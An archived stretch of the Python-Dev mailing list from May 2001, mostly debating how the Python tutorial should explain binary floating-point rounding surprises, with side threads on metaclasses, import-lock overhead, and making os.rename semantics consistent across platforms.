             <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com> 
Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com>

> Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
> so long as we rely on the platform C to format floats, the output isn't
> well-defined (the last digit or so can and will vary across boxes).

I can't check right now, but I thought that this was pretty consistent
across some common platforms?

> I can certainly explain that this is so, and even why, but unsure
> the tutorial is the right place for it.  In any case the tutorial
> shouldn't be giving examples whose output is platform-dependent.
> For example, don't use 10 * 3.14, use 10 * 3.25.  Want me to scour
> the tutorial for all such cases?

Are you serious?

This is something that the newbie wou is in the least bit adventurous
will run into anyway, so I don't think that not talking about this at
all in the tutorial is fair or helpful.  That just perpetuates the
questions from newbies about "floating point is broken" -- since none
of the tutorial examples prepare them for this.

Since this is behavior that is ordinarily observed and perpetually
perplexing, I think it *must* be treated in the tutorial.  The
tutorial doesn't have to have the full explanation -- maybe it's
enough to say something like ``due to round-off errors you will
sometimes see inexact results like 31.400000000000002; don't worry
about this, you can use str() or "%g" (but not round()!) to strip
redundant precision, and here's a URL for more info.''

Or maybe the full story can be an appendix.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz at rahul.net  Mon May 21 22:09:04 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:09:04 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM
Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
> Or maybe the full story can be an appendix.

Or maybe Decimal should go in the standard distribution?  What kind of
deadline do I have for finishing that to go into 2.2?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido at digicool.com  Mon May 21 22:35:10 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:35:10 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT."
             <20010521200904.05CAE99C81@waltz.rahul.net> 
References: <20010521200904.05CAE99C81@waltz.rahul.net> 
Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com>

> > Or maybe the full story can be an appendix.
> 
> Or maybe Decimal should go in the standard distribution?  What kind of
> deadline do I have for finishing that to go into 2.2?

Adding Decimal to the distribution is fine.  But using it by default
for floating point literals and other floating point results is a
different story.  The PEP about that hasn't really been discussed
enough to make a decision, but a conservative estimate is that this
change won't be made in 2.2.  So Decimal doesn't solve the problem the
tutorial has.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz at rahul.net  Mon May 21 22:42:15 2001
From: aahz at rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:42:15 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM
Message-ID: <20010521204215.F216699C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
>>> Or maybe the full story can be an appendix.
>> 
>> Or maybe Decimal should go in the standard distribution?  What kind of
>> deadline do I have for finishing that to go into 2.2?
> 
> Adding Decimal to the distribution is fine.  But using it by default
> for floating point literals and other floating point results is a
> different story.  The PEP about that hasn't really been discussed
> enough to make a decision, but a conservative estimate is that this
> change won't be made in 2.2.  So Decimal doesn't solve the problem the
> tutorial has.

Wasn't thinking of going quite that far, only changing the tutorial to
say something like, "If you want speed, use the hardware FP (which is
directly supported by Python's floating literals); if you want accuracy,
use Decimal."  (Or FixedPoint, which is already in the distribution.)
The full story needn't go in the Appendix; we can simply refer people to
Cowlishaw and Kahan.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido at digicool.com  Mon May 21 22:57:08 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:57:08 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT."
             <20010521204215.F216699C81@waltz.rahul.net> 
References: <20010521204215.F216699C81@waltz.rahul.net> 
Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com>

[Aahz]
> >>> Or maybe the full story can be an appendix.
> >> 
> >> Or maybe Decimal should go in the standard distribution?  What kind of
> >> deadline do I have for finishing that to go into 2.2?

[Guido]
> > Adding Decimal to the distribution is fine.  But using it by default
> > for floating point literals and other floating point results is a
> > different story.  The PEP about that hasn't really been discussed
> > enough to make a decision, but a conservative estimate is that this
> > change won't be made in 2.2.  So Decimal doesn't solve the problem the
> > tutorial has.

[Aahz]
> Wasn't thinking of going quite that far, only changing the tutorial to
> say something like, "If you want speed, use the hardware FP (which is
> directly supported by Python's floating literals); if you want accuracy,
> use Decimal."  (Or FixedPoint, which is already in the distribution.)
> The full story needn't go in the Appendix; we can simply refer people to
> Cowlishaw and Kahan.

I think that most people don't care about either speed or accuracy,
but (being Python users) everybody cares about convenience, and
convenience is using the built-in floating point literals.  (Also,
most other modules returning or using floating point numbers use
binary floating point, e.g. the time module and of course the math
module.)

As long as the built-in literals are binary floating point, they are
what 99% of the code uses, so we need to explain the pitfalls.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake at cj42289-a.reston1.va.home.com  Mon May 21 23:47:35 2001
From: fdrake at cj42289-a.reston1.va.home.com (Fred Drake)
Date: Mon, 21 May 2001 17:47:35 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental updates to the Python 2.2 documentation.


From tim at digicool.com  Mon May 21 23:57:22 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 21 May 2001 17:57:22 -0400
Subject: [Python-Dev] FP vs. tutorial
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>

Let's get some errors cleared up first:

+ FixedPoint is not in the distribution.

+ There is no PEP for Decimal.

+ Decimal f.p. is not more accurate than binary f.p.  In fact, it's
  provably worse (but not by much).

For the rest,

+ Yes, I'm serious about not including tutorial examples with
  platform-dependent output, unless they're explicitly meant to
  illustrate non-portable code.

+ Specific small examples notwithstanding, there is no uniformity
  across platforms in the last digit or so, because not even the IEEE-
  754 standard requires that (while C is much sloppier than 754), and
  vendors generally don't implement anything better than the minimum
  necessary when it comes to f.p. (Sun is a notable exception).

+ Happy to add text explaining the existence of surprises, and
  providing a URL.  Do the floating-point morons <wink> on Python-Dev
  find this one comprehensible?:

    http://www.lahey.com/float.htm


From guido at digicool.com  Tue May 22 00:33:17 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 18:33:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT."
             <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com> 
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com> 
Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com>

> + Yes, I'm serious about not including tutorial examples with
>   platform-dependent output, unless they're explicitly meant to
>   illustrate non-portable code.

Sure.  Most examples can be rewritten to avoid platform-dependent
output.  But there should be one section on floating-point
inaccuracies that shows a few of the kind of things you can expect on
a typical platform, and 1.1 -> 1.1000000000000001 is pretty common.

> + Specific small examples notwithstanding, there is no uniformity
>   across platforms in the last digit or so, because not even the IEEE-
>   754 standard requires that (while C is much sloppier than 754), and
>   vendors generally don't implement anything better than the minimum
>   necessary when it comes to f.p. (Sun is a notable exception).

So we'll have to add something like "the actual inexact output you see
may differ from the inexact output in this example".

> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I was thinking more of immortalizing this one:

http://www.python.org/cgi-bin/moinmoin/RepresentationError

This can serve as a nice self-contained section on f.p. surprises.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From MarkH at ActiveState.com  Tue May 22 01:06:39 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:06:39 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>

> > + Happy to add text explaining the existence of surprises, and
> >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> >   find this one comprehensible?:

Hey - I resemble that remark!

> >     http://www.lahey.com/float.htm

I quite liked the tone of this note.  The Python-dev morons probably could
make good sense of this, but only due to the relentless persistence of a
certain timbot.

If not for Tim, I would have forgotten completely about binary floating
point versus decimal floating point.  IIRC, me and about 40 other guys were
desperately trying to get the attention of the single CS female on the day
that lecture was given.  (Actually, that is a pretty safe bet - _all_
lectures were spent that way :)

However, without a little additional background I doubt the masses would be
able to get too far into this.

As Tim has said a few times, most people wont care - they just want it to
work!

> I was thinking more of immortalizing this one:
>
> http://www.python.org/cgi-bin/moinmoin/RepresentationError

IMO, this is a little worse.  There is less "background".  Eg, in almost the
first paragraph we see:

"""
Rewriting
    1        J
   ---  ~= ----
   10      2**N
"""

And I went "huh?  Where did j and N spring from?".  Reading a bit further
made it clear, but this document did seem a little impenetrable to floating
point or maths newbies.

It seems to me that the RepresentationError document was written for people
with a decent background in maths - exactly the sort of people who _don't_
need such a document.

Just-my-0.020000002-cents-worth ly,

Mark.


From jeremy at digicool.com  Tue May 22 01:13:09 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Mon, 21 May 2001 19:13:09 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
References: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <15113.41221.839653.822246@slothrop.digicool.com>

We looked at the SecondImport test case today.  It's a good test case
for programs that execute "import os" in a time-critical inner loop
:-).

The primary reason it is slower is the import lock that was added
after 1.5.2.  The benchmark, run in isolation, spends about 6 percent
of its time in the locking code.  Since it only spends about 20
percent of its time actually doing imports, this is a pretty
substantial cost.

It seems possible to eliminate some of the cost by using a special
marker in sys.modules that means: "This is not a module, but it's
being loaded by another thread."  But Guido doesn't sound interested
in optimizing programs with imports in inner loops.

Jeremy


From tim at digicool.com  Tue May 22 01:20:16 2001
From: tim at digicool.com (Tim Peters)
Date: Mon, 21 May 2001 19:20:16 -0400
Subject: [Python-Dev] test_mailbox now fails on Windows
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJGCAAA.tim@digicool.com>

Appears to be because new code uses os.link, which doesn't exist on Windows.

BTW, test_urllib2.py is still failing on Windows (and has been for a couple
of weeks).


From michel at digicool.com  Tue May 22 01:42:49 2001
From: michel at digicool.com (Michel Pelletier)
Date: Mon, 21 May 2001 16:42:49 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>

On Tue, 22 May 2001, Mark Hammond wrote:

> > > + Happy to add text explaining the existence of surprises, and
> > >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> > >   find this one comprehensible?:
> 
> Hey - I resemble that remark!

As they say in the south, "mah-self"

> > >     http://www.lahey.com/float.htm
> 
> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.

I liked the tone too, but it really goes into a lot of detail, there's
this problem, and that one, oh and also *this* one and then there's *that*
and the other thing, and after a while you get the impression that
floating-point is for the insane.

> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys were
> desperately trying to get the attention of the single CS female on the day
> that lecture was given.  (Actually, that is a pretty safe bet - _all_
> lectures were spent that way :)

<sidetrack> 
The funny thing about that is we were in *Long Beach* (I
assume you mean IPC9), if you wanted to see beautiful, scarcely clothed
women in an acceptable public venue you woudn't have had to go far, and
they would have probably had more interesting "significant bits" (it's
none of anyones business where *I* was during the lectures ;).

Someone on the Zope list proposed P4W (Python for Women).  Poor, desperate
souls.  Obviously, P4E includes them too!!
</sidetrack>

> > I was thinking more of immortalizing this one:
> >
> > http://www.python.org/cgi-bin/moinmoin/RepresentationError
> 
> IMO, this is a little worse.

I agree.  Equations should not be needed to explain this.

-Michel


From MarkH at ActiveState.com  Tue May 22 01:47:06 2001
From: MarkH at ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:47:06 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEIMDNAA.MarkH@ActiveState.com>

> <sidetrack>
> The funny thing about that is we were in *Long Beach* (I
> assume you mean IPC9), if you wanted to see beautiful, scarcely clothed

Actually, I meant the computer science lectures all those years ago.
Literally one female.

And-not-much-has-changed ly,

Mark.


From guido at digicool.com  Tue May 22 05:22:40 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:22:40 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000."
             <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com> 
References: <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com> 
Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com>

Hi Alan,

Thanks a lot for your input.  I am cc'ing this reply to python-dev
because I think my reply will be interesting for others.
(Python-dev'ers: Alan expressed concern that introducing Smalltalk
metaclasses would make Python unnecessarily complicated.)


The way my thinking is currently going, it's not likely that Python
will get a metaclass system similar to Smalltalk.  However, unifying
types and classes is useful for other reasons: please go to
http://python.sourceforge.net/peps/ to read PEP 252 which explains how
introspection can become simpler and more powerful by unifying the
introspection mechanisms for types and classes.

There will still be metaclasses, but the metaclasses will be less
important than in Smalltalk.  Class methods as commonly seen in
Smalltalk are not high on my priority list, and the metaclass
hierarchy won't be parallelling the regular class hierarchy.  Instead,
most metaclass programming will be done in C by programmers who want
to implement alternative class policies.

For example, the current class implementation gives each class a
__dict__ for methods and class variables, and dynamically searches the
class hierarchy for methods.  An alternative inheritance policy could
merge the __dict__ of the base class(es) with the __dict__ of the
derived class at class declaration time: this would make method lookup
a single dict lookup no matter how many levels of base classes are
involved, at the cost of making classes less dynamic, because a change
to a base class won't be seen in a derived class.  A metaclass
controls method lookup and class construction, and thus a different
metaclass can be used to change this policy for selected class
hierarchies without changing the default policy (which would be
backwards incompatible).

Other policies under control of a metaclass could include overriding
hooks for getattr and setattr, alternative mechanisms to store
instance variables (e.g. slot-based rather than dict-based), and so
on.

While I think I can make it possible to write metaclasses in pure
Python (by subclassing types.TypeType), I expect that most
metaprogramming will be done in C, for performance reasons and for
maximum flexibility.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Tue May 22 05:55:26 2001
From: guido at digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:55:26 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT."
             <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com> 
References: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com> 
Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com>

> [Guido]
> > I would like to break this down by defining the mapping between cmp()
> > and rich comparisons.

[Tim]
> Good idea!

Followed by many nitpicking questions about what I meant.  As a matter
of process, I think it's better to try to channel instead of challenge
me.  I just don't seem to have the concentration necessary to come up
with all the details needed to make this worthy of a language
definition, and you do.

If you want a BDFL proclamation on currently gray areas in the rules,
or a reversal of what the current implementation does in some cases,
please draft a definition with a few leading questions.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one at home.com  Tue May 22 06:02:18 2001
From: tim.one at home.com (Tim Peters)
Date: Tue, 22 May 2001 00:02:18 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKGKDAA.tim.one@home.com>

[Mark Hammond, on http://www.lahey.com/float.htm]

> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.
>
> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys
> were desperately trying to get the attention of the single CS female on
> the day that lecture was given.  (Actually, that is a pretty safe bet -
> _all_ lectures were spent that way :)

I remember guys like you.  Well guess what?  You ended up with a baby, while
I'm known on two continents as the author of tabnanny.py.  Ha!  Revenge is a
dish best eaten cold <burp>.

> However, without a little additional background I doubt the masses would
> be able to get too far into this.

There's only so much you can say to unmotivated people who are also unwilling
to learn.  That's not my problem.  Finding them a gentle intro from which
they *could* learn isn't either, but typing a URL is easy enough that I don't
mind.

Here:  I want to script MS Word with Python.  I don't know COM and refuse to
learn anything about it.  I'd rather not install win32all either, and import
statements confuse me.  Why don't you make it easy for me?  It's the same
thing -- you can point them at what they need to learn if they're serious,
else they're simply out of luck.

[And on]
>> http://www.python.org/cgi-bin/moinmoin/RepresentationError
>
> IMO, this is a little worse.

In one sense it's much worse:  it's only trying to explain a single cause of
fp surprises.  OTOH, it explains it precisely while giving the reader the
tools needed to do an exact analysis of any case of that particular class.
The Lahey link touches on all the common sources of surprises, but leaves
them fuzzy.

> There is less "background".  Eg, in almost the first paragraph we see:
>
> """
> Rewriting
>     1        J
>    ---  ~= ----
>    10      2**N
> """
>
> And I went "huh?  Where did j and N spring from?".  Reading a bit further
> made it clear, but this document did seem a little impenetrable to
> floating point or maths newbies.

It did its job for them if it simply scared them <0.5 wink>.

> It seems to me that the RepresentationError document was written for
> people with a decent background in maths -

There's nothing more complicated than integer division there.

> exactly the sort of people who _don't_ need such a document.

They actually do:  regardless of math background, nothing about f.p. is
obvious before studying f.p. as a subject in its own right.  It's "not like"
anything else, and in previous lives I spent a good chunk of my work time
explaining the same stuff to doctorates.  Mathematicians were actually the
hardest audience at first, perhaps because they had the hardest time
admitting they didn't already understand it; after getting beyond bruised
professional pride, though, they were the easiest audience to bring up to
speed.


From tim at digicool.com  Tue May 22 06:58:21 2001
From: tim at digicool.com (Tim Peters)
Date: Tue, 22 May 2001 00:58:21 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>

[Michel Pelletier, on http://www.lahey.com/float.htm]
> I liked the tone too, but it really goes into a lot of detail, there's
> this problem, and that one, oh and also *this* one and then there's
> *that* and the other thing, and after a while you get the impression
> that floating-point is for the insane.

Using an unfamiliar power tool with sharp edges, and while blindfolded, is
insane.

[and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]

> I agree.  Equations should not be needed to explain this.

There's exactly one equation on that page, saying that one ratio of two
integers is approximately equal to another ratio of two integers.  If that's
too much for you, and you weren't satisfied with the *initial* hand-wavy
explanation ("1/10 is not exactly representable as a binary fraction")
either, then it's up to you to do better than the latter without actually
saying anything useful <wink>:

Q:  Why is Python broken:

    >>> 0.1
    0.10000000000000001

A:  [your turn]


From gward at python.net  Tue May 22 15:41:57 2001
From: gward at python.net (Greg Ward)
Date: Tue, 22 May 2001 09:41:57 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>; from tim@digicool.com on Mon, May 21, 2001 at 05:57:22PM -0400
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>
Message-ID: <20010522094157.A1245@gerg.ca>

On 21 May 2001, Tim Peters said:
> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I found this article more useful, interesting, and informative than
whatever I learned about binary floating-point in my academic years.
Good link, Tim.  Two catches:

  * I can just barely follow the FORTRAN examples; I very much doubt
    the average Python newbie would have any more luck than me

  * I tried several of the FORTRAN examples in Python, and did not
    witness any of the gotchas they are meant to illustrate.  Possibly
    it's just single-precision vs. double-precision difference, but
    Python 2.1 under Linux 2.2 on an Athlon compiled with gcc 2.95.2
    doesn't demonstrate the same gotchas as that article does.

        Greg
-- 
Greg Ward - geek                                        gward at python.net
http://starship.python.net/~gward/
Ban the bomb -- save the world for conventional warfare.


From skip at pobox.com  Tue May 22 18:01:40 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 22 May 2001 11:01:40 -0500
Subject: [Python-Dev] type/class unification and ExtensionClass
Message-ID: <15114.36196.4677.99240@beluga.mojam.com>

I know Guido has recently been working on some of the type/class unification
issues (PEPs 252 and 253).  Will this affect ExtensionClass?  In particular,
will it go away or have to be reworked significantly for Python 2.2 or 2.3?
The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
hard it would be to move away from ExtensionClass for these wrappers.  My
reading of PEP 253 suggests this shouldn't be too difficult.

I'd ask Guido directly, but I figure other people on this list might also
have useful input on the issue and/or be able to answer, saving him the
time.  At any rate, he will see it posted here just the same.

Thx,

Skip


From guido at digicool.com  Tue May 22 18:23:52 2001
From: guido at digicool.com (Guido van Rossum)
Date: Tue, 22 May 2001 12:23:52 -0400
Subject: [Python-Dev] type/class unification and ExtensionClass
In-Reply-To: Your message of "Tue, 22 May 2001 11:01:40 CDT."
             <15114.36196.4677.99240@beluga.mojam.com> 
References: <15114.36196.4677.99240@beluga.mojam.com> 
Message-ID: <200105221623.f4MGNqC02110@odiug.digicool.com>

> I know Guido has recently been working on some of the type/class unification
> issues (PEPs 252 and 253).

And I'm not done yet. :-)

> Will this affect ExtensionClass?  In particular,
> will it go away or have to be reworked significantly for Python 2.2 or 2.3?

Probably.  Jim Fulton in particular asked me to work on this because
he wants to phase out ExtensionClass.

> The new PyGtk wrappers use the ExtensionClass module.  I'm curious about how
> hard it would be to move away from ExtensionClass for these wrappers.  My
> reading of PEP 253 suggests this shouldn't be too difficult.

I don't think so either.

> I'd ask Guido directly, but I figure other people on this list might also
> have useful input on the issue and/or be able to answer, saving him the
> time.  At any rate, he will see it posted here just the same.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From michel at digicool.com  Tue May 22 23:44:09 2001
From: michel at digicool.com (Michel Pelletier)
Date: Tue, 22 May 2001 14:44:09 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
Message-ID: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>

On Tue, 22 May 2001, Tim Peters wrote:

> [Michel Pelletier, on http://www.lahey.com/float.htm]
> > I liked the tone too, but it really goes into a lot of detail, there's
> > this problem, and that one, oh and also *this* one and then there's
> > *that* and the other thing, and after a while you get the impression
> > that floating-point is for the insane.
> 
> Using an unfamiliar power tool with sharp edges, and while blindfolded, is
> insane.

I should have been more clear, I liked the first couple of paragraphs for
their descriptions, and there is certainly nothing wrong with the document
as it stands, but such an explanation would be a bit too lengthly and
boring to a typical fifth grader or photoshop guru going through the
Tutorial and dabbling in programming for the very first time.

> [and on http://www.python.org/cgi-bin/moinmoin/RepresentationError]
> 
> > I agree.  Equations should not be needed to explain this.
> 
> There's exactly one equation on that page, saying that one ratio of two
> integers is approximately equal to another ratio of two integers.

Who was it that said every equation will halve your audience?  I agree
with that, the tutorial should try to be as broad and simple as possible.

> If that's
> too much for you, and you weren't satisfied with the *initial* hand-wavy
> explanation ("1/10 is not exactly representable as a binary fraction")
> either, then it's up to you to do better than the latter without actually
> saying anything useful <wink>:

The latter is fine, although I think the first document hand-waves better.  

-Michel


From skip at pobox.com  Tue May 22 23:54:42 2001
From: skip at pobox.com (skip at pobox.com)
Date: Tue, 22 May 2001 16:54:42 -0500
Subject: [Python-Dev] unifying os.rename semantics across platform
Message-ID: <15114.57378.887742.531145@beluga.mojam.com>

Couldn't figure out why this message never generated any comment.  Turns out
it didn't reach the list because the host I sent it from
(dynamic4.tttech.com) couldn't be resolved.  I just noticed it in my errors
mailbox and am sending it out again.

------------------------------------------------------------------------------
It was brought to my attention a week ago by a client that os.rename
semantics differ between Unix and Windows.  On Unix, if the destination file
already exists it is silently deleted.  On Windows, an exception is raised.
I was able to verify this for Python 2.0 on Windows98.  I assume nothing
changed for 2.1, but I can't verify that.  (Windows trashed my partition
table and my Linux root partition while I was downloading 2.1.
Consequently, I no longer run Windows.  Take that, Bill...)  I haven't
checked the Mac yet (will do that when I get back to the US), but I think
that os.rename should have the same semantics across all platforms.  To the
extent reasonably possible, I think this should also be true of other common
functions exposed through the os module.

On the (unsupportable) theory that to-date, more Python apps have been
written and/or deployed on Unix-like systems and that where Windows apps are
concerned, many developers will have added a thin wrapper to mimic the Unix
semantics, I think less breakage would result if the Unix semantics were
implemented in the Windows version.  It appears that is what POSIX
compliance would demand as well.

Skip


From fdrake at acm.org  Tue May 22 23:55:29 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 17:55:29 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
References: <LNBBLJKPBEHFEDALKOLCMEKIKDAA.tim@digicool.com>
	<Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <15114.57425.540688.205255@cj42289-a.reston1.va.home.com>

Michel Pelletier writes:
 > as it stands, but such an explanation would be a bit too lengthly and
 > boring to a typical fifth grader or photoshop guru going through the
 > Tutorial and dabbling in programming for the very first time.

  But that's not the audience the Python Tutorial is targetted to --
readers are expected to be essentially competant in at least one "3rd
generation" language.  Maybe a few will shy away from a simple
equation, but not so many.  Those who do would do well to shy away
from FP as well.  ;-)


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Wed May 23 00:04:11 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 22 May 2001 18:04:11 -0400 (EDT)
Subject: [Python-Dev] unifying os.rename semantics across platform
In-Reply-To: <15114.57378.887742.531145@beluga.mojam.com>
References: <15114.57378.887742.531145@beluga.mojam.com>
Message-ID: <15114.57947.313813.522806@cj42289-a.reston1.va.home.com>

skip at pobox.com writes:
 > On the (unsupportable) theory that to-date, more Python apps have been
 > written and/or deployed on Unix-like systems and that where Windows apps are
 > concerned, many developers will have added a thin wrapper to mimic the Unix
 > semantics, I think less breakage would result if the Unix semantics were

  I don't know whether there are more deployed Python apps on Unix
than on Windows (and I've no good idea about how to find out), but I
think unifying the semantics one way or the other is a good thing.
Regardless of which set of semantics is chosen.


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From mwh at python.net  Wed May 23 00:07:12 2001
From: mwh at python.net (Michael Hudson)
Date: 22 May 2001 23:07:12 +0100
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Michel Pelletier's message of "Tue, 22 May 2001 14:44:09 -0700 (PDT)"
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
Message-ID: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>

Michel Pelletier <michel at digicool.com> writes:

> Who was it that said every equation will halve your audience?

It was Stephen Hawking's editor when he was preparing A Brief History
Of Time (or at least, it gets mentioned in the preface; the advice may
be older).

Cheers,
M.

-- 
7. It is easier to write an incorrect program than understand a
   correct one.
  -- Alan Perlis, http://www.cs.yale.edu/homes/perlis-alan/quotes.html


From jeremy at digicool.com  Wed May 23 00:57:40 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Tue, 22 May 2001 18:57:40 -0400 (EDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
References: <Pine.LNX.4.21.0105221432100.21762-100000@localhost.localdomain>
	<m33d9xkpgv.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <15114.61156.692322.674137@slothrop.digicool.com>

>>>>> "MWH" == Michael Hudson <mwh at python.net> writes:

  MWH> Michel Pelletier <michel at digicool.com> writes:
  >> Who was it that said every equation will halve your audience?

  MWH> It was Stephen Hawking's editor when he was preparing A Brief
  MWH> History Of Time (or at least, it gets mentioned in the preface;
  MWH> the advice may be older).

There's a similar saw about excerpts of books in foreign languages.  I
believe I first read it in reference to Umberto Eco's Foucault's
Pendulum, which starts with a full page of Hebrew.

Jeremy


From chrishbarker at home.net  Wed May 23 01:21:01 2001
From: chrishbarker at home.net (Chris Barker)
Date: Tue, 22 May 2001 16:21:01 -0700
Subject: [Pythonmac-SIG] Re: [Python-Dev] Import hook to do end-of-line   
 conversion?
References: <20010414192445-r01010600-f8273ce6@213.84.27.177>
Message-ID: <3B0AF45D.732126E6@home.net>

Just van Rossum wrote:

